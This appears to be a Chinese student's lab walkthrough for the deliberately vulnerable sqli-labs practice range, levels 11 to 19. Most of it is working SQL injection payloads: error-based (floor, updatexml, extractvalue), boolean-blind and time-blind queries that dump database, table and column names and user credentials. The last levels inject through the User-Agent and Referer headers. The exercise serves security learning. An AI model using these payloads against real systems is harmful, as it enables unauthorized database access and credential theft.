sqli-labs靶场

less---11

1.求闭合字符

输入1'报错说明存在注入点

存在注入点

2.查库名

使用报错注入查库名

admin” and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)y)# //floor函数报错

3.查表名

admin' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x23),1)#

4.查列名

admin' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x23),1)#

5.查字段

admin' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from users),0x23),1)#

less--12

求闭合字符

1"      //报错双引号闭合
1"#     //依然报错，说明闭合字符包含双引号
1")    //报错，闭合字符是")
1")#   //无报错

同 less--11

less---13

admin') and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)y)# 
//floor报错求库名
admin') and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')))#
//求表明共extractvalue可以接收两个参数，报错位置在第二个参数
admin') and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ),0x23),1)#
//爆列名
admin') and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from users),0x23),1)#
//爆字段

less---14

这关没有报错可以通过图片选择盲注,闭合字符"

admin" and 1=1# 
//双引号闭合
admin" and length(database())=8#
//判断当前数据库长度
admin" and ascii(substr(database(),1,1))=115#
//判断数据库ascii值
admin" and (select count(table_name) from information_schema.tables where table_schema='security' )=4#
admin" and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),1,1))=101#
admin" and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users' )=#
admin" and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105#

less--15

发现and后加两个空格会报错

admin' and  ascii(substr(database(),1,1))=115#     //报错

单引号闭合，同上

less--16

这里回显也没有了,时间盲注

1.求闭合字符")

11111") or if(1=1,1,sleep(5))#或者
11111") or 1=1#
//求闭合字符

2.求数据库长度

8") or if(length(database())=8,sleep(5),1)#
//这里设置了暂停时间是5秒，但是不知道什么原因1没问题，执行到sleep会一直加载直到报504

最终通过试验发现当为and且前面正确时sleep（5）正常运行

3.求数据库名

8") or if(ascii(substr((select database()),1,1))=115,1,sleep(5))#
//求数据库名ASCII值
2") or if((select count(table_name) from information_schema.tables where table_schema='security')=4,1,sleep(5))#
//求表数
8") or if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))#
//求表明ASCII值
2") or if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3,1,sleep(5))#
//求列数
8") or if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,1,sleep(5))#
//求列明ASCII值
2") or if(ascii(substr((select username from users limit 0,1),1,1))=67,sleep(5),1)#
//求字段

less--17   

看提示在密码框注入，报错注入同11

less---18  uagrent

这关代码，发现密码账号框输入没用。

• • 对输入长度进行了限制（最多保留前20个字符）。
  • 如果启用了 magic_quotes_gpc，去除了多余的转义字符。
  • 对非数字的输入进行了转义，以防止 SQL 注入攻击；如果是数字，则直接转换为整型。

没有对u-agrent进行过滤

使用报错注入，后面加，1,1）补全     和#注释 防报错

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)

//原码

less--19

这里登录进去之后显示referer ,所以在referer处注入